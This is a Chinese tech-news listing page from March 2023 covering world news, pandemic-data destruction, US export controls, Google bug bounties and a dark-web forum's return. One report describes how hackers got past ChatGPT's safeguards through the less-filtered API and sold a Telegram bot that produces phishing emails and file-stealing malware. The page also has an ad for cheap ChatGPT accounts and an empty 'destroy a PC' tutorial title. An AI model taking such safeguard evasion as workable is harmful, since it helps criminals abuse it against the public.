12、日本首相:不会改变福岛核污染水在今春排放入海的计划;韩媒:应对福岛核废水排海,韩外交部已设专案组;斐济:因日本核污染水排海计划处于高度戒备; 13、当地3日凌晨,尼日利亚南部河流州一输油管道发生爆炸,造成至少12人丧生,事发时有当地民众正从该管道盗取石油; 14、俄媒:一组乌破坏分子潜入俄边境城市布良斯克州实施"恐怖袭击",造成2人死亡。普京:将此事件定义为"恐怖袭击"。乌克兰否认袭击事件;俄媒:俄罗斯政府希望量产民用无人机,需求约为10万架; 15、当地3日,美国将宣布新一轮对乌军事支持,价值约4亿美元,其中包括首次提供的8辆装甲架桥车;俄媒:俄潜艇在日本海发射"口径"巡航导弹,命中1000公里外目标的岸上目标; 【微语】脚下的路,没人替你决定方向,心中的梦,没人替你去完成。风吹雨打知生活,苦尽甘来懂人生,没有等来的辉煌,只有拼来的精彩。...

    2023-03-04 244
  • 首批10亿个人涉疫数据销毁;浪潮、龙芯、第四范式等进入美国实体清单,拜登政府公布527亿美元芯片补贴细则;

    首批10亿个人涉疫数据销毁 2023 年 3 月 2 日,无锡市举行涉疫个人数据销毁仪式,首批销毁 10 亿余条此前出于疫情防控及服务目的存储在城市大数据中心的个人信息数据。 为确保数据彻底销毁、无法还原,无锡还邀请了第三方审计和公证处参与工作。至此,无锡市第一批涉疫个人数据实现成功销毁,全力保障了公民个人数据安全。同时,门铃码、疫查通、货运通行证等 40 多项“数字防疫”应用,也于当天功成身退,陆续下线。 对于这一消息,不少网友纷纷留言:感动、支持、认真负责、大赞...... 无锡市的标准答案 回顾 2022 年年底,我国疫情防控取得了决定性胜利,疫情防控进入常态化的阶段,那么此前收集的海量公民个人数据如何处理,成为大家关心的问题。FreeBuf 曾发文“行程卡下线,健康码将退出舞台,我们的数据该如何处理?”,就这一话题进行讨论和分享。 那时,还有无数人担心自己的个人数据安不安全,会不会存在泄露的风险?现在,无锡市给出了一个标准答案。 随着首批数据正式销毁成功,接下来必定还会有越来越多的个人涉疫数据被销毁,其他的省市地区必定也会跟上节奏,全国个人涉疫数据销毁指日可待。 据“无锡平安”公众号发文,无锡市“数字防疫”服务上线以来,共搜集了 10 亿条个人数据,主要用于核酸筛查、流调溯源、外防输入性疫情、重点人群核酸检测等用途,为确保疫情防控顺利进行,提供坚实的数据支撑。 “此次销毁涉疫个人数据,一是体现了依法执政理念,依法依规删除目的已经实现的数据;二是保护了公民隐私,防止数字时代公民个人信息被盗用或滥用;三是防止了数据泄露,通过数据彻底销毁减少数据泄露的可能性;四是节约了存储空间,进一步提高存储效率。” “下一步,城市大数据中心将进一步加强数据分类分级管理,数据安全风险评估、监测预警、数据安全审查等制度建设,确保数据无法被恢复。 同时持续加强对技术运维人员的安全教育,加强数据安全合规理念,提升全员数据安全意识,严格禁止私下留存、转移涉疫数据等行为,全力保障公民个人隐私。” 事实上,无锡并不是第一个销毁涉疫数据的城市。在此之前,不少省市地区都曾表示要“按照《中华人民共和国数据安全法》《中华人民共和国个人信息保护法》等法律法规有关规定,采取严格的技术和管理措施,依法依规保障个人信息安全。停止相关服务后,彻底删除、销毁服务相关所有数据,切实保障个人信息安全。” 但是,这些消息都不如无锡市此次数据销毁来的直接与令人信服。涉疫个人数据体量之大、影响范围之广,关注度之高都远超其他类型的数据,以一种公开、透明的方式来处理好这些数据,不仅让公民安心,也展现出我国对于公民个人信息保护的态度与决心。 当下,数字经济驱动全球发展,而数据负责驱动数字经济,数据安全与治理则是数据正常使用的前提,是其发挥核心要素作用的基础。 浪潮、龙芯、第四范式等进入美国实体清单,拜登政府公布527亿美元芯片补贴细则   比尔·盖茨3月2日表示:“我认为美国永远无法成功阻止中国拥有强大的芯片,我们将‘迫使’中国花时间和大量的金钱来制造自己的芯片。” (图片来源:AP) 北京时间3月3日凌晨,美国商务部下属的工业和安全局(下称“BIS”)更新了实体清单(Entity List),添加37个实体。 其中,有28个中国实体企业、研发机构和个人被列入该清单,包括浪潮集团股份有限公司、第四范式技术有限公司、龙芯中科(688047.SH)、华大基因旗下的华大基因研究院以及华大基因技术(香港)有限公司、国家并行计算机工程技术研究中心、银河电子(002519.SH)、Liang Ping Huang和罗定文(Luo Dingwen)等。BIS表示,这些实体和个人“威胁美国国家安全”。向上述实体清单上的实体出口、再出口或转让(国内)《出口管理条例》(EAR)项下管制的物项均需取得BIS的许可,不适用许可例外;许可申请审查将依照该实体中注明的审查政策及美国EAR其他相关条款规定。简单来说,只有获得美国的授权,上述清单企业才能取得美国的产品和技 术。 根据美国商务部早前公布的数据,目前,美国对华出口管制的“实体清单”上共有639家中国实体,其中超155个是拜登政府期间增加的。 与此同时,美国商务部还计划继续限制芯片企业投资。2月28日美国公布总值2800亿美元《芯片和科学法案》当中527亿美元芯片和科技企业补贴细则,其中提及中国,要求受补贴的实体承诺即日起的10年内,不得在中国等“受关注的国外实体”新建投资、扩充产能(有实质性的半导体产能扩大的重要交易计划,成熟制程除外),须向美国商务部通报,其有权收回补贴;美国商务部长雷蒙多(Gina Raimondo)还表示,拜登政府正在考虑一项先导计划(pilot program),限制美国的创投基金投资于中国芯片半导体或 AI 技术。她估计,美国可能要数月来落实有关先导方案。 随着美国持续对中国先进芯片和 AI 等高科技产品进行出口管制限制,中国正加大“国产替代”力度。 据英国《金融时报》报道,微软公司创始人比尔·盖茨(Bill Gates)3月2日表示:“我认为美国永远无法成功阻止中国拥有强大的芯片,我们将‘迫使’中国花时间和大量的金钱来制造自己的芯片。” 由于美国最新出口管制实体清单涉及多家上市和关键公司,3月3日上午,浪潮信息回应媒体称,公司正在进一步核实评估 ,暂无更多信息同步。浪潮信息早盘集合竞价一字跌停,封单金额超15亿;华大基因方面则表示,公司正在和新闻来源相关方沟通核实,稍后若有进一步进展,可留意公司官网或公告。 美国政府再列28家中国实体和个人,涉及多家上市公司。 此次美国商务部BIS更新的实体清单,新增37个实体的38个条目,其中涉及白俄罗斯 (1)、缅甸 (3)、中国 (28)、巴基斯坦 (4)、俄罗斯 (1) 和一个中国台湾实体。同时,BIS此次还修改了北京航空航天大学在内的 10 家中国科研机构现有条目。美国商务部表示,新的实体清单规则自2023年3月2日起生效。 具体来说,BIS称,苏州盛科通信有限公司(Suzhou Centec Communications Co.)、苏州盛科技术有限公司、Galaxy Electronics等八个实体因从事违反美国国家安全和外交政策利益的活动而被列入实体名单,涉及对伊朗Paradazan System Namad Arman (PASNA) 供货中包含美国的技术。 同时,BIS还将保定捷安特进出口有限公司、罗定文等五个中国实体列入实体清单,涉及巴基斯坦计划,许可申请将根据EAR的744.3(d) 进行审查;北京正源创世咨询有限公司、宏泰电气有限公司、南京科柏机械设备有限公司等八个实体也将受限美国商务部许可,涉及中国和巴基斯坦的运输工作,许可证申请将根据EAR的744.2(d) 和 744.3(d)。 BIS还指出,华大基因旗下的华大基因研究院以及华大基因技术(香港)有限公司、Forensic Genomics International被列入实体清单,美国BIS认为他们对基因数据的收集和分析构成了极大的风险,这些实体许可证将接受多个项目的逐案审查,以及所有其他受EAR约束的项目的拒绝推定。 同时,此次BIS列入最新“实体清单”还包括AI 公司第四范式,半导体公司浪潮集团股份有限公司、龙芯科技,以及国家并行计算机工程技术研究中心、青岛海洋科学与技术国家实验室、无锡先进技术学院。美国商务部认为上述实体违反美国国家安全和外交政策利益,意味着上述实体都需要获得美国商务部许可,而且受EAR约束的项目的拒绝推定。 此外,BIS还修改了此前的十个中国现有实体的条目的规则名称,包括北京理工大学增加9个别名和9个地址;北京航空航天大学许可政策修改为拒绝推定、而且添加10个别名和8个地址;北京邮电大学添加2个别名和2个地址;哈尔滨工程大学条目中添加2个别名;哈尔滨工业大学添加9个别名和9个地址;南京航空航天大学词条新增5个别名6个地址;南京理工大学词条新增5个别名和5个地址;西北工业大学条目中添加7个别名和9个地址;四川大学增加了5个别名和4个地址;天津大学增加了13个别名和13个地址。上述中国大学和科研机构此前均已被列入美国商务部出口管制清单中。 早在2月28日美国国会听证会上,美国商务部分管工业和安全的副部长艾伦·埃斯特维兹(Alan Estevez)表示,目前,美国对华出口管制的“实体清单”(entity list)上,共有639家中国实体,其中超155个是拜登政府期间增加的。自2022年7月以来,BIS已新增53个中国实体到“实体清单”。受管制的领域包括人工智能、芯片半导体、生物科技和量子计算等。 他还称,2022财年(2021年7月1日-2022年6月30日)对华出口许可申请中,约有69.9%获批,剩下申请被拒绝或退回。同时据统计,经BIS调查后,9名涉及中国的个人和企业被定罪,服刑期限总计152个月,刑事罚款总计约18.55万美元,赔偿约72万美元。而在2021财年,约66%的刑事处罚和约40%的行政处罚与对华出口违法行为有关,总额近600万美元,并导致约226个月的监禁。 埃斯特维兹回顾过去一年,对中国先进计算和半导体生产的政策,BIS分别展开了三点措施:先进计算方面,BIS实施外国直接产品规则,限制对华出口先进计算和人工智能领域的芯片及相关产品、超级计算机领域的芯片及相关产品,同时对28家中国实体使用外国直接产品规则;在半导体生产上,限制对全中国出口某些先进制程芯片的生产工具,对技术超过一定水平的芯片生产者,限制出口美国的工具,限制对华出口用于生产半导体生产设备的物项。 此外,BIS还扩大了管制物项名单,包括超宽禁带半导体和用于GAAFET架构(环绕栅极晶体管)电脑辅助设计的ECAD软件,这些物项涉及3nm及以下先进制程的关键芯片设计技术;还对四种自然发生的两用海洋毒素进行新的管控;考虑管控自动肽合成技术,正在征询公众意见;以及考虑关注和管控脑机接口(BCI)技术出口到中国等地,主办了相关会议,以更好了解这项技术。 2月16日,BIS与司法部联合宣布组建“颠覆性技术保护打击组织”。埃斯特维兹表示,该小组将致力于保护美国的先进技术不被对手国家非法获取和使用。打击部队将派驻在12个美国城市,并得到华盛顿特区一个跨部门情报小组的支持。 此次国会听证会上,美国众议院中国问题特别委员会主席、共和党籍众议员盖拉格(Mike Gallagher)等多位涉及中国的美国官员也均出席。盖拉格表示,“美国未来10年的政策将为未来100年来奠基。” 527亿美元芯片补贴细则公布,雷蒙多:拜登政府正考虑一项先导计划 除了限制半导体出口之外,美国商务部还在推动通过芯片补贴办法让制造业回流美国。 2月28日,美国商务部官网公布总值2800亿美元《芯片和科学法案》(CHIPS and Science Act of 2022)中企业补贴细则,共计10个大项。 根据该法案,直接拨给芯片行业的补贴为527亿美元,分为四个基金,将于连续五个财年派发。美国政府称,这将确保芯片在美国的供应,创造数万个高薪的建筑业岗位以及数千个高技能制造业岗位,更重要的是,这将拉动数千亿美元的私人领域投资。 补贴将分为两部分:直接补贴总计达382.2亿美元;贷款和贷款担保方面,将能保证提供达750亿美元的直接贷款或保证本金。公告称,不期待花完所有补贴款项。芯片项目办公室预计,直接补贴、贷款及贷款担保的总金额,不会超过项目资本开支的35%,其中,大多数直接补贴额度将介于项目资本支出的5%至15%之间。 负责具体项目执行的是美国国家标准与技术研究所(NIST)下属的芯片项目办公室(CHIPS Program Office),预计将在2023年春末开始半导体材料和制造设备设施的补贴流程,2023年秋初开始研发设施的补贴流程。根据公告,自2月28日起,所有潜在申请者开始递交意向声明。先进制程半导体生产者将于3月31日起开始预申请或全面申请;当前一代制程、成熟制程或后端生产者则将于5月1日起开始预申请,6月26日起开始全面申请。 美国商务部长雷蒙多表示,美国将利用规模达527亿美元的《芯片法案》资金,在2030年前创建至少两个尖端半导体制造产业集群。这标志着一项将更多芯片制造业务带回美国的计划进入了初始阶段。 “美国92%的最先进制程芯片都依赖于台积电,这是一个不可持续的短板。”雷蒙多2月24日在乔治城大学发表演讲时表示,美国商务部希望在这项计划完成时,美国能成为世界上唯一一个每家能够生产尖端芯片的公司都设有重要研发和量产制造业务的国家。 值得注意的是,此次《芯片法案》细则中多处提及中国,要求受补贴的实体如果与中国等“受关注的国外实体”有实质性的半导体产能扩大的重要交易计划(成熟制程除外),须向美国商务部通报,美国商务部有权收回补贴。而且申请人必须签订一项协议,承诺在接受补贴之日起的10年内,不得与任何“受关注的国外实体”进行实质性提升半导体制造能力的任何重大交易,在部分有限条件下除外。 这意味着,一旦英特尔、台积电、三星、美光科技等芯片企业获得美国政府给予的足够芯片补贴,未来十年内很可能将不会在中国大陆境内进行投资扩产。 根据IC Insights此前数据,2020年中国芯片市场规模为1443亿美元,约占全球的36%;其中晶圆制造产值为227亿美元,约占全球的16%,如果剔除台积电、SK海力士、三星、英特尔等非本土厂商在中国大陆的产值,由中国企业贡献的晶圆制造产值仅为83亿美元。这意味着,2020年海外厂商在国内的制造规模为144亿美元(约合人民币993.95亿元)左右。 获两党支持的《芯片法案》在国会通过后,于去年8月由美国总统拜登签署成为法律。该法案为建立和扩大生产设施提供390亿美元的激励措施,并为研发以及劳动力发展提供120多亿美元。根据美国半导体产业协会SIA数据,美国的芯片补贴计划引发了投资热潮,美国和外国制造商公布了40多个项目,投资总额接近2000亿美元。 这意味着,芯片企业潜在高达千亿美元的投资扩产计划正在流向美国。 担任美国商务部顾问的Hunt在2022年的一份报告中说,通过《芯片法案》提供的230亿美元激励措施将使拥有此类技术的三家公司——英特尔、三星和台积电——得以维持或建立在美国的长期业务,以满足美国国内到2027年的需求。 “这项立法的目的不是因为这些公司在周期性衰退中挣扎求生而向它们提供补贴,也不是为了帮助企业一定能提高在美国的利润率,”雷蒙多表示,“其实,我们在此投资的回报是我们国家安全目标的实现。每一件精密的军事设备、每一架无人机、每一颗卫星都依赖于半导体芯片。” 与此同时,3月3日,雷蒙多在美国华盛顿对媒体表示,拜登政府正在考虑一项先导计划(pilot program),以解决向中国投资的风险。她说,美国不想不必要地升级,但不希望美国的创投基金投资于中国军队会使用的半导体技术或人工智能技术。 雷蒙多估计,美国可能要数月来落实有关先导方案。 不过,目前尚不清楚美国政府何时最终确定任何对外投资限制。但雷蒙多认为,有很多美国养老基金投资于中国和这涉及人民的退休金,并不希望这一计划范围过大,任何过于广泛的措施都会伤害美国就业者和经济。预计该计划可能将影响部分美元基金机构的未来投资布局。 对于中美现状,比尔·盖茨表达担忧看法。他3月2日对英国《金融时报》说,“我认为美国无法永远成功阻止中国拥有强大的芯片,我们将迫使他们(中国)花费时间和大笔金钱来制造自己的芯片。这样的结果只是掏空我们可以一直向他们出售芯片的想法”。 “你知道,我们说的是制造你自己的喷气发动机、你自己的软件、你自己的芯片。我认为这是一种耻辱,我不明白其中的逻辑。”比尔盖茨认为,考虑到中国的规模和速度,他不认为美国的做法能带来什么巨大好处。 他强调:“我希望美国和中国能够更好地相处。我们两国的关系似乎处于恶化趋势,即使我们有如健康、创新、气候等能在所有国家之间创造双赢的东西。世界上最重要的关系是美中关系,我对过去几年这种关系的演变感到失望和担忧。” ...

    2023-03-04 284
  • 谷歌2022年发放了8200万元漏洞赏金,平均每个漏洞近3万元

    703名白帽子,2022年共提交2900个有效漏洞报告,斩获超8000万元奖金,平均每人可领取约18万元。 安全内参3月2日消息,过去一年,谷歌通过漏洞奖励计划支付了公司史上最高的总奖金金额,并对单个关键漏洞利用链奖励60.5万美元,打破单笔奖金纪录。2022年全年,安全研究人员发现和上报的谷歌产品漏洞超过2900个,搜索巨头总计为此向703位研究人员支付了超1200万美元(约合人民币8200万元)。图:2022年谷歌支付的漏洞奖金总额跃升至1200万美元 Android 单个漏洞奖金创纪录 谷歌发布了2022年漏洞奖励计划(VRP)的相关统计数据,概括了安全研究社区为提高谷歌产品安全性做出的贡献。其中最大一笔奖金来自gzobqq提交的报告,详细介绍了一组Android漏洞利用链(CVE-2022-20427、CVE-2022-20428、CVE-2022-20454、CVE-2022-20459、CVE-2022-20460),总额达60.5万美元(约合人民币410万元)。2021年,gzobqq还发现并上报了Android中的另一条关键漏洞利用链,拿下15.7万美元,创造了当年的Android漏洞奖励计划的奖金纪录。一般来说,通过谷歌漏洞奖金计划提交的Android 漏洞奖金不会超过1万美元。但对于漏洞利用链,谷歌设定的奖金上限则高达100万美元。2022年,谷歌为700余个Android漏洞支付了480万美元奖金。做出突出贡献的各主要漏洞研究人员包括: 安全厂商Bugsmirror的Aman Pandey,超过200个bug; OPPO安珀安全实验室的韩子诺,—150个bug; 林禹成,近100个bug。 去年,谷歌还组织了仅限受邀人士参加的Android芯片组安全奖励计划(ACSRP),共发现700份安全报告并发放48.6万美元奖金。这是一项由谷歌及Android芯片组制造商合作设立的内部奖励计划。 Chrome与开源软件漏洞赏金 2022年,谷歌还为Chrome浏览器中的363个漏洞和ChromeOS中的110个安全缺陷支付了总计400万美元。谷歌宣布,今年Chrome 漏洞奖励计划也将开始试运行,希望为浏览器和ChromeOS的安全问题上报注入更多活力。2022年8月推出的开源产品漏洞奖励计划,迄今已向100多位研究人员发放了超11万美元奖金。除了根据发现和上报的漏洞支付奖金之外,谷歌还向170多名研究人员提供了超25万美元的赠款。尽管没有发现任何漏洞,但谷歌仍感谢这些个人对于谷歌产品和服务的持续关注和研究。谷歌还成为了NahamCon和BountyCon等安全会议的赞助商。    ...

    2023-03-03 301
  • 3月3日新闻早讯,每天60秒读懂世界

    3月3日,农历二月十二,星期五 在这里,每天60秒读懂世界! 1、人社部:参加个人养老金制度人数已达2817万人,个人养老金每年缴费上限1.2万元,会适时调整缴费上限; 2、国家卫健委:要求各地高度重视流感、诺如病毒感染医疗救治; 3、两部门:对主观恶性大、情节恶劣的轻伤害案件要依法从严惩处;最高检等三部门:依法保障律师知情、阅卷、会见等执业权利; 4、政协委员葛均波:学历不等于能力,建议合理缩短医生培养时间;政协委员孟晓苏:建议中国将1000万元作为遗产税的起征点;人大代表庹庆明:建议高考外语降至100分,用时太多,用处不大; 5、南京再出稳楼市政策:二手房交易公积金贷款可办理"带押过户"业务; 6、3月1日深夜,新疆吐鲁番市高昌区发生一起交通事故,一半挂牵引货车撞到道路施工隔离墩后,与一道路作业车发生碰撞,造成7死7伤; 7、江西大余发布农村婚嫁彩礼举报公告:彩礼超8万、婚车超6辆,婚宴超过15桌,每桌超过800元可举报; 8、台媒:当地3月1日,美国务院批准新一轮对台军售案,其中包括F-16战斗机机载导弹及相关设备,总价值高达6.19亿美元,或是应对解放军巡岛;外交部:将采取措施,捍卫主权; 9、中国互联网络信息中心:我国网民规模达10.67亿,互联网普及率达75.6%; 10、此前柬埔寨一女孩感染禽流感死亡后,专家在其身上分离出病毒检测发现病毒已发现突变,世卫组织:对人类健康构成持续威胁; 11、美媒:希腊火车相撞事故已致43人死亡,仍有数十人下落不明,事故主要由人为错误导致。火车工人工会宣布罢工;外媒:英海军在阿曼湾国际水域扣押伊朗制武器,包括反坦克导弹等; 12、外媒:"70后"武文赏当选新一任越南国家主席,曾系越共历史上最年轻的中央书记处书记; 13、外媒:新加坡大幅提高投资移民门槛,申请人需投资至少人民币5100万元; 14、世界气象组织:已持续3年的拉尼娜即将结束,厄尔尼诺或将归来,今夏可能更热; 15、特斯拉在首次投资者日活动上展示了人形"擎天柱"机器人的视频,马斯克:相信机器人业务未来将超过汽车业务,人形机器人数量将超过人类; 【微语】生活从来都不会停止推你向前,保持专注,别因为后悔而放慢脚步。...

    2023-03-03 207
  • Dread论坛的管理员更新了公告,暗网网站状态已经是Online

    自Dread论坛管理员1月底称网站有可能在一周内恢复,又已经过去了一个月。转眼已到3月份,“Kirin博客”发现,随着 "Dread"论坛的管理员又陆续更新了网站公告以及私人“金丝雀”(canary),并且其暗网网站状态已经显示绿色的“在线”(online)。 根据Dread暗网网站,在2月11日,其发布公告称: 现在的更新是故意的,由于进一步的问题,因为我试图急于求成,过度简化了打算重写的理论,我们已经留下了一些艰难的决定,这将使重新启动可能不符合我想提供的目标。DoS解决方法的概念正处于最后的测试阶段,只是由于与一些市场管理员的接触有限而被保留,我们希望确保他们的服务能够提供有机流量的可访问性。我目前正在将一些小的新功能/更新迁移到以前的Dread代码库中,我们将在这个时候以最好的能力重新启动。我现在正在避开Reddit,因为那里有大量的投诉和疑虑,这只会给我们所有人带来更多的头痛。我们正在努力工作,很快就会恢复我们所有人的平衡。 2月25日,新的公告称: Dread现在已经在生产服务器上进行了私人测试。暂时邀请了服务管理员和一些Dread版主。我将在Reddit上发布更多有关信息。 2月28日,Dread管理员HugBunter更新金丝雀称依旧活着,并完全控制着Dread网络和相关服务。在Dread中断期间,将继续更新金丝雀专门发布在Dread的网络状态页面。但是如果其洋葱网络不可访问,他将通过/r/DreadAlert在reddit进行紧急更新。 —–BEGIN PGP SIGNED MESSAGE—–Hash: SHA512 I, HugBunter am alive and free as of Tuesday, February 28th, 2023 and in full control of the Dread Network and related services. I have signed this canary for publishing specifically on our network status page during the current outage. Bitcoin block hash:0000000000000000000503b050e7e39453cf479711c5c04df95f672de3300804 Emergency updates are available here or at reddit via /r/DreadAlert if our onion becomes unavailable. Next canary is due Monday, March 6th, 2023.—–BEGIN PGP SIGNATURE—– iQIzBAEBCgAdFiEEYTOs4fS4fFHb8/6l6GEFEPmm6SIFAmP+bmoACgkQ6GEFEPmm6SKxZA/8ClG06+XdJArKKYSWDbpYaFUMRuQZgRmy48oanErwOUHVb1OgRQXDxLZHtdtxSkK8Yg0ndwTpB9ZueP6sLDWSpMP69HflAYT+fd+NAbu0uKmoMNSMIenhlkyGpTwFB9BW/sgEjtDZszUXbRi++5BwonNWyp7XOPtBXaYg9gmjuDZRiSXxjk1rgBmjtPzC1ZUY2rkdU9XPqVX4+XVtzeWrxArQ3C/rhG/WrQD6guAJOXJh5umDAP+LpWk7FPP5BMKU1qlkj/Wbt8o6DfDiHm+8wqAVht3U5HFHJsw8A643s3oP6x7NyTcV8jpc6vyEDtLM89+1qVHWcNUpy8Ky7BTCmrwcDXu1KkA88ayor69FdDkDPxJ5D5bhxf8GoNuerY+VtJ6obK6t5moSIXlWft4pZmRzCD2naF+1SQOjWo+T0i1Vi2An95HEvMXx7IlXYdjAZrNjWWyJdU8a9e4mr8eNxSU61uVc4a4lhT8OwrXMQUZlmO2go5w088crJ4Iq9YlOYkZbTmEhsLjYqEFJnlgd9jlIBCzDUA1in6ASpwH5p3Di+KAzM/l17+d8+NfR6GBTNiyuQZTsY7NK/tQpGxj+F1UhS2V2vBfmzRyzbrOqd8y3V91P6CdQ7RqTzHWkZs7MRZsrvMIU+gnczIorbiYB4LUS1HXaCVqiWZxRi7ztY6M==BWnw—–END PGP SIGNATURE—– 3月1日,Dread管理员Paris也更新金丝雀称还活着,并同样完全控制着Dread网络和相关服务。并称修复了很多东西,“末日游戏V3”(指新版本的Dread)将为所有人到来。 —–BEGIN PGP SIGNED MESSAGE—–Hash: SHA256 I, Paris am alive and free as of Wednesday, Mar 1st, 2023 and in full control of the Dread Network and related services. Patching up many things. Endgame V3 is coming for all. Emergency updates are available here or at reddit via /r/DreadAlert if our onion becomes unavailable. Next canary is due Monday, Mar 6th, 2023. Bitcoin Block: 000000000000000000063dfef2c6b90b6d0689310dff63bcdb30097e79d8063a—–BEGIN PGP SIGNATURE—– iQIzBAEBCAAdFiEEbfleES3oPdbct1q5DE1JcU+sN9gFAmP+61wACgkQDE1JcU+sN9hcgg//eBgQyIGX03NaBGIiwAEU9H0v127pJHGeouJucIscOR+/IAIB2aHSSjULqsSmKtyEc/12TnqKngEjFGGkeWx++FF1AUk0U2V6rLUVSz3lyDDmCStUYHkEB+BB8yY1dUwsk/kWJbmD/f8IwDTEYg+wBDvk7ewziP8QH3aFKj0qgDVvhvUdWZRAYPEFTNySTyJKDQXc81PrIng+c4zw/5MGnbJw0dQo5ifaSO18KJ99Jp/1CPaoRu73lolkVuLNL3SPYo4w6nQgndcQjNl0z7DBp28Gc7hwQenTBTyUtrjnbVmVqLaXOKqiJxPWfBfkGRRUW1QwziculwDGbZaFoyrTk1SE5cpXMGeyOgsulrPEQCKePFZ5XIo7FYkVZ5Pt+E73+Fq7IQb+FKyGH8dF0OSobf2g2RSEv6/zd5Ht9hzhCeuABervo3KPqZVjXPt3sJ0RLtT5E9XRqXzRbLDdGQX1LFVe9iF2sdUcbRXSGYP9WVIKB2YxceH9XGS6+IjZ138UNxEPfq3aJvQ44gSbZme8YByRD9OyPkTG8cnzi9Zy0N/xxvmkz1bRWMz0Fzxs8UlQ1mWQLWZOXN3tNSA4m3EHTS50bYV3Flv+wgDP9c6XcSTJnxBA+XV2DVN4PjA+uw/PxsuRJ/yGuAMQ+YiDsR34dBMvLkOGX+W0SNyyGlDUWi8==xKZj—–END PGP SIGNATURE—– HugBunter与Paris都表示下次将在3月6日更新金丝雀。离Dread论坛真正恢复访问越来越近了。 更多暗网新闻动态,请关注“Kirin博客”。...

    2023-03-03 264
  • 黑客靠ChatGPT赚钱:每100次收费37元,还能修改恶意软件代码;软件巨头数据库在暗网公布,亚马逊、波音、摩根大通等都受影响

    黑客靠ChatGPT赚钱:每100次收费37元,还能修改恶意软件代码 现在,黑客已经靠ChatGPT赚钱了——机器人即服务RaaS,前20次免费使用,之后每100次收取5.5美元(约37元)。服务范围主要包括恶意内容的创建,比如写写网络钓鱼邮件、改改恶意软件代码之类。总之,整个过程没有任何OpenAI的限制和障碍,你可以用它来为所欲为。目前OpenAI这边还有任何回复。 “机器人即服务” 据相关安全公司消息,黑客们首先找到一种可以绕过OpenAI限制的方法,通过使用ChatGPT API集成到他们的一个应用程序中。事实上证明,相较于网页端,API版本反而不会对恶意内容进行强制限制。其中有个论坛的用户,就将其与Telegram消息APP结合起来,以此来出售服务Telegram bot。甚至还正儿八经地做了广告。 △图源:Enlarge 前20次查询免费,随后用户每100次查询需要收费5.5美元。安全机构的研究人员测试了这种绕过方法,结果收获了一封钓鱼软件,以及一个病毒脚本,可以从感染计算机中窃取PDF文件,并通过FTP发送给攻击者。 △Telegram bot生成的钓鱼软件,图源:Enlarge △Telegram bot生成的恶意软件,图源:Enlarge(下同)   与此同时,其他黑客也在发布一些可以免费生成恶意内容的代码。 这有个Bash脚本,可帮助绕过ChatGPT限制,做任何你想做的事情。 对于以往的恶意软件代码,比如Infostealer,ChatGPT也可以进行改进。 这也进一步地给了网络犯罪分子可乘之机。黑客与OpenAI斗智斗勇自ChatGPT诞生之日起,就有大量黑客试图将ChatGPT越狱,来生成各种恶意内容。根据访问通道不同,大体有两种方式。一种是Web用户界面,一种是API,将OpenAI的模型和数据跟你自己的应用界面配套使用。比如这些都是合法认证的APP。 此前,黑客们使用Web端ChatGPT生成恶意软件和钓鱼邮件很容易。但随着ChatGPT的监管不断加强。OpenAI的CTO也在最近的采访中提及了监管的重要性。黑客们逐渐开始转战去使用他们的API,结果限制要少得多。对于这件事,有网友表示:没有万无一失的修复方法。因为ChatGPT是一种语言模型,黑客总是可以找到违反OpenAI内容政策的提示。 好了,这场黑客与OpenAI的斗智斗勇,你怎么看呢? 软件巨头数据库在暗网公布,亚马逊、波音、摩根大通等都受影响 当地时间2月28日消息,美国软件公司Beeline的数据库被攻击者发布在黑客论坛上,数据库内包含亚马逊、瑞士信贷、3M、波音、宝马、戴姆勒、摩根大通、麦当劳、蒙特利尔银行等Beeline客户的数据。 该数据库大约1.5GB,据称是攻击者从Beeline的Jira账户中窃取的。Jira是由Atlassian开发的问题跟踪软件,用于bug跟踪和项目管理活动。与此同时,Beeline运营着一项软件即服务(SaaS)业务,专注于寻找和管理劳动力。 【攻击者在黑客论坛上的发帖】 攻击者声称该数据库包含Beeline的客户数据,例如名字、姓氏、Beeline用户名、职位以及其他数据。黑客论坛的帖子表明,这些数据窃取于2月25日。 记者通过邮件联系Beeline,但截至文章发表前暂未收到回复。 Cybernews研究人员调查了论坛上发布的样本数据,推测泄露的数据包括合法的公司数据。攻击者在论坛帖子中的一些屏幕截图的文件类型是用俄语编写的,这表明攻击者的操作系统默认语言可能是俄语。   超低价ChatGPT账号:http://299r.cn/xmp/?mod=buy&tid=12 ...

    2023-03-02 265
  • 3月2日新闻早讯,每天60秒读懂世界

    3月2日,农历二月十一,星期四 在这里,每天60秒读懂世界! 1、中国气象局:3月将有3次冷空气过程,冷空气总体减弱,需防范空气污染; 2、中国渤海再发现亿吨级油田:距离天津市约170公里,可开采原油超2000万吨,可供万辆小汽车行驶30年; 3、统计:2月美军53架次侦察机前往南海侦察,相较1月的64架次侦察机有所减少; 4、最高法明确:遭受职场性骚扰有权依法请求精神损害赔偿;工信部:加快布局元宇宙等前沿领域,全面推进6G技术研发; 5、新疆广汇男篮宣布退出CBA。姚明回应:尊重决定,表示遗憾; 6、哈尔滨:取消购车户口区域限制,在本市购买机动车可直接落户上牌; 7、广州:子女3周岁以内,父母每年各享受10日的育儿假,3月1日起施行; 8、河南:3月1日起,调整"住院诊查费"等92个医疗服务价格项目内容,取消"门诊输液费"等68项医疗服务价格项目; 9、韩国抗日独立纪念日当天,尹锡悦发表讲话:日本已从军国主义侵略者转变为合作伙伴; 10、日本死亡人数是新生儿数量两倍,2022年出生人口创百年新低,新生儿跌破80万,岸田文雄表态:情况危急!;岸田文雄:日本今后或"不再完全依赖美国的打击能力"; 11、英媒:英国国王查尔斯三世已决定将哈里夫妇逐出王室小屋,这意味着哈里夫妇将失去他们在英国的唯一住所; 12、国际原子能机构:伊朗一核设施内检测到丰度为83.7%的浓缩铀,已接近武器级丰度;美高官:伊朗约12天可产一枚核弹所需裂变材料,美媒:震惊!; 13、美媒:一列载有3万加仑丙烷的火车在佛罗里达州脱轨,但当地还没有化学品泄漏的报道; 14、俄媒:一架乌克兰制造军用无人机,坠毁于莫斯科州一处天然气压缩机站附近;外媒:乌克兰否认派无人机袭俄领土,乌军或从巴赫穆特河撤军; 15、当地28日,希腊两辆火车相撞,导致车厢脱轨,截至目前,已有38死至少85伤,官员:一司机不知对面有列车驶来。希腊总理宣布全国哀悼三天,外媒:欧盟至今未建立统一铁路网; 【微语】总以为自己还年轻,却忽略了岁月的脚步,当身边的一道道风景变成了回忆,却忽然发现,风景依然在,人已非少年。...

    2023-03-02 195
  • 10秒毁了一台电脑教程(无视任何杀毒软件)

